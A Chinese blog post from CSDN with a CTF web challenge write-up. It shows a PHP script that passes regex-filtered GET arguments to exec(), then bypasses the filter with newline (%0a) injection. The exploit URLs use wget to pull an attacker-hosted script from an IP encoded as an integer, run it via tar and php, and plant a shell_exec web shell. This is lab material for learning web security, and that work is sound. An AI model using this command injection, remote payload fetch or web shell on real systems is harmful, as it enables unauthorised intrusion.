CTF web题总结--绕过正则表达式

最新推荐文章于 2024-07-25 15:08:11 发布
最新推荐文章于 2024-07-25 15:08:11 发布
阅读量1.2w 收藏 11
点赞数
文章标签: 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20817327/article/details/77720823
版权

代码:

<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);


    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){
        if ( !preg_match('/^\w+$/', $args[$i]) )
            exit();
    }

    exec('./ ' . implode(" ", $args));
?>

解题:
从源码可以看出index.php可以执行纯字母数字的linux命令,目标是去读flag.php文件中的flag.
1. 利用换行可绕过正则表达式执行命令。
2. 通过生成ip地址长整数绕过正则表达式,下载exploit脚本。
3. 通过tar命令将无后缀脚本打包,再用php命令执行

Example:
http://localhost/index.php?args[]=whatever%0a&args[]=mkdir&args[]=test%0a&args[]=cd&args[]=test%0a&args[]=wget&args[]=3232254721(本地ip的长整型,wget IP是会获得首页,所以可以把脚本写到index.html里)
http://localhost/index.php?args[]=whatever%0a&args[]=tar&args[]=cvf&args[]=exploit&args[]=test%0a&args[]=php&args[]=exploit

可以看到./后面跟了一个空格,所以无论如何都没有办法一条命令解决。这个时候需要使用多条命令。
首先使用%0A做截断,相当于换行执行之后的命令。之后就是想办法传入shell
因为没有办法直接下载一个php文件(正则限制不能包含点)

<?php
file_put_contents('shell.php', '<?php header("Content-Type: text/plain");
print shell_exec($_GET["cmd"]);?>
');
?>

所以将上面的脚本放到自己的服务器上,然后通过wget获取之后用tar打包
然后再用php执行tar包即可写入一个shell文件,然后就可以拿到flag

http://localhost/shell.php?cat flag.php
bob62856
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFWeb关于执行读取文件命令的相关知识与绕过技巧
2401_84971075的博客
05-16 362
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
最全CTF Web思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web思路总结笔记
ctf新手总结--web
Martin-share的博客
10-24 1625
ctf新手总结--web
CTF_Web:如何认识并计算一个正则表达式
AFCC_的博客(Web_Dog)
08-19 948
0x00 前言 整理CTFweb 的基础知识时发现很多都会与正则匹配相结合,这篇文章来学习一下正则表达式的相关知识。在读懂一个正则表达式的要求后,如何去饶过他也是很关键的,这里使用菜鸟教程的一个在线的正则匹配会比较方便:正则表达式在线测试。 0x01 什么是正则表达式 正则表达式(regular expression)描述了一种字符串匹配的模式(pattern),可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串取出符合某个条件的子串等。当然实现什么功能,最后还是要看使用什么匹配模式,本质
【Flag】-PHP-正则绕过
soldi_er的博客
09-02 1609
文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考 最近RCTF分站赛要开始了,梳理一些知识。 【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {
XCTF-攻防世界CTF平台-Web类——18、favorite_number(命令注入)(php5.5.9整数溢出、preg_match正则表达式绕过
Onlyone_1314的博客
01-15 3599
目录标方法1:ls -i方法2:定义变量输出方法3:写到文件输出方法4:``和$()命令替换 打开目地址: 提示了源代码,以及php版本是5.5.9 <?php //php5.5.9 $stuff = $_POST["stuff"]; $array = ['admin', 'user']; if($stuff === $array && $stuff[0] != 'admin') { $num= $_POST["num"]; if (preg_match("/^
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php反序列化漏洞绕过__wakeup()函数、正则表达式
Onlyone_1314的博客
11-27 1129
打开目地址: 这也是一个php反序列化的目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
ctfshow萌新计划web9-14(正则匹配绕过
Welcome To Myon'Blog !
10-12 510
可以使用通配符 * 或者 ? 进行模糊查询 构造payload:?c=(~%8C%86%8C%8B%9A%92)('tac c*'); 或者:?c=(~%8C%86%8C%8B%9A%92)('tac ???fi??p??');即对我们想要执行的代码进行取反,url编码,再取反 目源代码里也有提示,flag在config.php里面
ctf web5 练习_CTF web总结 第六课 CTF WEB实战练习(二)
weixin_39636176的博客
12-20 1393
继上一篇总结CTF web总结-第五课 CTF WEB实战练习(一)以下也是我在bugku练习的解过程。以下内容大多是我在Bugku自己操作练习,有部分来源于网络,我只是在前人的基础上,对CET WEB进行一个总结;----------------------------------------------------------------------------------------...
CTF-100.-天天练习-学习
11-01
CTF-100.-----------------天天练习------------------学习 100小,试例练习
006-CTF web总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一:成绩单** 这个目可能...
005-CTF web总结-第五课 CTF WEB实战练习(一).pdf
07-09
本篇将对"005-CTF web总结-第五课 CTF WEB实战练习(一)"的部分目进行详细解析。 1. **Web2**:这是一道基础的Web安全目,可能涉及到SQL注入或文件包含漏洞。参赛者需要理解HTTP请求构造,以及如何通过...
007-CTF web总结-第七课 CTF WEB实战练习(三).pdf
07-09
007-CTF Web总结的第七课主要涵盖了三个部分:入门第一部分、入门第二部分-社工篇和入门第三部分-高级篇。这些部分详细介绍了在CTF(Capture The Flag)网络安全竞赛常见的Web挑战类型,并通过Bugku平台上的...
ctf-all-in-one
01-30
ctf-all-in-one
正则表达式概述
MrLi的博客
07-25 684
正则表达式(Regular Expression,简称regex或regexp)是一种强大的文本处理工具,它使用一种特定的模式来描述和匹配一系列符合某个句法规则的字符串。在Python,我们可以使用re模块来操作正则表达式正则表达式是一种强大的文本处理工具,它使用特定的模式来描述和匹配字符串。Python的re模块提供了丰富的函数来操作正则表达式,包括search()match()findall()等。通过学习和掌握正则表达式的语法和使用方法,我们可以更加高效地进行文本处理和信息提取工作。
LABVIEW TCP通讯调试助手
07-29
本文接收如何利用Labview的TCP通讯工具做通讯,这里手把手教各位做一个简单的TCP通讯调试助手,可以局域网互相聊天哦! 具体介绍见下面连接:https://download.csdn.net/download/weixin_41671635/89595897
机器学习与人工智能教程
最新发布
07-29
机器学习与人工智能教程
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 目。在 PHP ,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值